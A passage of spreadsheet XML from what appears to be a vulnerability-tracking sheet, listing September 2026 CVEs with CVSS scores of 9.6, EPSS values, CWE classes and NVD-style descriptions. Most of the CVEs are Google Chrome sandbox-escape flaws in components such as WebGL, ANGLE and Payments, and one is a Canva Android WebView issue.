          <t>apple:iphone_os, google:chrome</t>
        </is>
      </c>
      <c r="I325" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J325" s="5" t="inlineStr"/>
      <c r="K325" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L325" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in Transactions Platform in Google Chrome on on iOS prior to 152.0.7977.82 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85047</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85050</t>
        </is>
      </c>
      <c r="C326" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D326" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E326" s="5" t="inlineStr"/>
      <c r="F326" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G326" s="5" t="inlineStr"/>
      <c r="H326" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I326" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J326" s="5" t="inlineStr"/>
      <c r="K326" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L326" s="5" t="inlineStr">
        <is>
          <t>Out of bounds write in WebGL in Google Chrome on on Android prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85050</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85085</t>
        </is>
      </c>
      <c r="C327" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D327" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E327" s="5" t="inlineStr"/>
      <c r="F327" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G327" s="5" t="inlineStr"/>
      <c r="H327" s="5" t="inlineStr"/>
      <c r="I327" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J327" s="5" t="inlineStr"/>
      <c r="K327" s="5" t="inlineStr">
        <is>
          <t>CWE-940</t>
        </is>
      </c>
      <c r="L327" s="5" t="inlineStr">
        <is>
          <t>The Canva Android App before 2.376.0 allowed an external origin to be loaded in a privileged WebView. A threat actor who controls the page loaded by the user is able to communicate with Canva using the user’s session.</t>
        </is>
      </c>
      <c r="M327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85085</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87438</t>
        </is>
      </c>
      <c r="C328" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D328" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E328" s="5" t="inlineStr"/>
      <c r="F328" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G328" s="5" t="inlineStr"/>
      <c r="H328" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I328" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J328" s="5" t="inlineStr"/>
      <c r="K328" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L328" s="5" t="inlineStr">
        <is>
          <t>Out of bounds write in WebGL in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="M328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87438</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87448</t>
        </is>
      </c>
      <c r="C329" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D329" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E329" s="5" t="inlineStr"/>
      <c r="F329" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G329" s="5" t="inlineStr"/>
      <c r="H329" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I329" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J329" s="5" t="inlineStr"/>
      <c r="K329" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L329" s="5" t="inlineStr">
        <is>
          <t>Use after free in DevTools in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87448</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87455</t>
        </is>
      </c>
      <c r="C330" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D330" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E330" s="5" t="inlineStr"/>
      <c r="F330" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G330" s="5" t="inlineStr"/>
      <c r="H330" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I330" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J330" s="5" t="inlineStr"/>
      <c r="K330" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L330" s="5" t="inlineStr">
        <is>
          <t>Use after free in Aura in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87455</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87464</t>
        </is>
      </c>
      <c r="C331" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D331" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E331" s="5" t="inlineStr"/>
      <c r="F331" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G331" s="5" t="inlineStr"/>
      <c r="H331" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I331" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J331" s="5" t="inlineStr"/>
      <c r="K331" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L331" s="5" t="inlineStr">
        <is>
          <t>Use after free in WebGL in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="M331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87464</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87470</t>
        </is>
      </c>
      <c r="C332" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D332" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E332" s="5" t="inlineStr"/>
      <c r="F332" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G332" s="5" t="inlineStr"/>
      <c r="H332" s="5" t="inlineStr">
        <is>
          <t>apple:macos, google:chrome</t>
        </is>
      </c>
      <c r="I332" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J332" s="5" t="inlineStr"/>
      <c r="K332" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="L332" s="5" t="inlineStr">
        <is>
          <t>Improper quantity validation in Tint in Google Chrome on on Mac prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87470</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87474</t>
        </is>
      </c>
      <c r="C333" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D333" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E333" s="5" t="inlineStr"/>
      <c r="F333" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G333" s="5" t="inlineStr"/>
      <c r="H333" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I333" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J333" s="5" t="inlineStr"/>
      <c r="K333" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L333" s="5" t="inlineStr">
        <is>
          <t>Use after free in Payments in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87474</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87488</t>
        </is>
      </c>
      <c r="C334" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D334" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E334" s="5" t="inlineStr"/>
      <c r="F334" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G334" s="5" t="inlineStr"/>
      <c r="H334" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I334" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J334" s="5" t="inlineStr"/>
      <c r="K334" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L334" s="5" t="inlineStr">
        <is>
          <t>Use after free in WebGL in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="M334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87488</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87492</t>
        </is>
      </c>
      <c r="C335" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D335" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E335" s="5" t="inlineStr"/>
      <c r="F335" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G335" s="5" t="inlineStr"/>
      <c r="H335" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I335" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J335" s="5" t="inlineStr"/>
      <c r="K335" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L335" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in DevTools in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87492</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87494</t>
        </is>
      </c>
      <c r="C336" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D336" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E336" s="5" t="inlineStr"/>
      <c r="F336" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G336" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H336" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I336" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J336" s="5" t="inlineStr"/>
      <c r="K336" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L336" s="5" t="inlineStr">
        <is>
          <t>Use after free in Browser in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87494</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87500</t>
        </is>
      </c>
      <c r="C337" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D337" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E337" s="5" t="inlineStr"/>
      <c r="F337" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G337" s="5" t="inlineStr"/>
      <c r="H337" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I337" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J337" s="5" t="inlineStr"/>
      <c r="K337" s="5" t="inlineStr">
        <is>
          <t>CWE-129</t>
        </is>
      </c>
      <c r="L337" s="5" t="inlineStr">
        <is>
          <t>Improper validation of array index in ANGLE in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87500</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87504</t>
        </is>
      </c>
      <c r="C338" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D338" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E338" s="5" t="inlineStr"/>
      <c r="F338" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G338" s="5" t="inlineStr"/>
      <c r="H338" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I338" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J338" s="5" t="inlineStr"/>
      <c r="K338" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L338" s="5" t="inlineStr">
        <is>
          <t>Use after free in Core in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to execute arbitrary code outside the sandbox via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87504</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87512</t>
        </is>
      </c>
      <c r="C339" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D339" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E339" s="5" t="inlineStr"/>
      <c r="F339" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G339" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H339" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I339" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J339" s="5" t="inlineStr"/>
      <c r="K339" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L339" s="5" t="inlineStr">
        <is>
          <t>Use after free in ANGLE in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87512</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87520</t>
        </is>
      </c>
      <c r="C340" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D340" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E340" s="5" t="inlineStr"/>
      <c r="F340" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G340" s="5" t="inlineStr"/>
      <c r="H340" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I340" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J340" s="5" t="inlineStr"/>
      <c r="K340" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L340" s="5" t="inlineStr">
        <is>
          <t>Use after free in Dawn in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87520</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87526</t>
        </is>
      </c>
      <c r="C341" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D341" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E341" s="5" t="inlineStr"/>
      <c r="F341" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G341" s="5" t="inlineStr"/>
      <c r="H341" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I341" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J341" s="5" t="inlineStr"/>
      <c r="K341" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L341" s="5" t="inlineStr">
        <is>
          <t>Use after free in Passwords in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to potentially execute arbitrary code outside the sandbox via UI Interaction. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87526</t>
        </is>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87527</t>
        </is>
      </c>
      <c r="C342" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D342" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E342" s="5" t="inlineStr"/>
      <c r="F342" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G342" s="5" t="inlineStr"/>
      <c r="H342" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I342" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J342" s="5" t="inlineStr"/>
      <c r="K342" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L342" s="5" t="inlineStr">
        <is>
          <t>Buffer overflow in WebGL in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="M342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87527</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87528</t>
        </is>
      </c>
      <c r="C343" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D343" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E343" s="5" t="inlineStr"/>
      <c r="F343" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G343" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H343" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I343" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J343" s="5" t="inlineStr"/>
      <c r="K343" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L343" s="5" t="inlineStr">
        <is>
          <t>Type confusion in Rust in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87528</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87529</t>
        </is>
      </c>
      <c r="C344" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D344" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E344" s="5" t="inlineStr"/>
      <c r="F344" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G344" s="5" t="inlineStr"/>
      <c r="H344" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I344" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J344" s="5" t="inlineStr"/>
      <c r="K344" s="5" t="inlineStr">
        <is>
          <t>CWE-197</t>
        </is>
      </c>
      <c r="L344" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Media in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87529</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87547</t>
        </is>
      </c>
      <c r="C345" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D345" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E345" s="5" t="inlineStr"/>
      <c r="F345" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G345" s="5" t="inlineStr"/>
      <c r="H345" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I345" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J345" s="5" t="inlineStr"/>
      <c r="K345" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="L345" s="5" t="inlineStr">
        <is>
          <t>Incorrect reference resolution in FileSystem in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87547</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87558</t>
        </is>
      </c>
      <c r="C346" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D346" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E346" s="5" t="inlineStr"/>
      <c r="F346" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G346" s="5" t="inlineStr"/>
      <c r="H346" s="5" t="inlineStr">
        <is>
          <t>apple:macos, google:chrome</t>
        </is>
      </c>
      <c r="I346" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J346" s="5" t="inlineStr"/>
      <c r="K346" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L346" s="5" t="inlineStr">
        <is>
          <t>Use after free in Payments in Google Chrome on on Mac prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87558</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87581</t>
        </is>
      </c>
      <c r="C347" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D347" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E347" s="5" t="inlineStr"/>
      <c r="F347" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G347" s="5" t="inlineStr"/>
      <c r="H347" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I347" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J347" s="5" t="inlineStr"/>
      <c r="K347" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L347" s="5" t="inlineStr">
        <is>
          <t>Use after free in Payments in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87581</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87607</t>
        </is>
      </c>
      <c r="C348" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D348" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E348" s="5" t="inlineStr"/>
      <c r="F348" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G348" s="5" t="inlineStr"/>
      <c r="H348" s="5" t="inlineStr">
        <is>
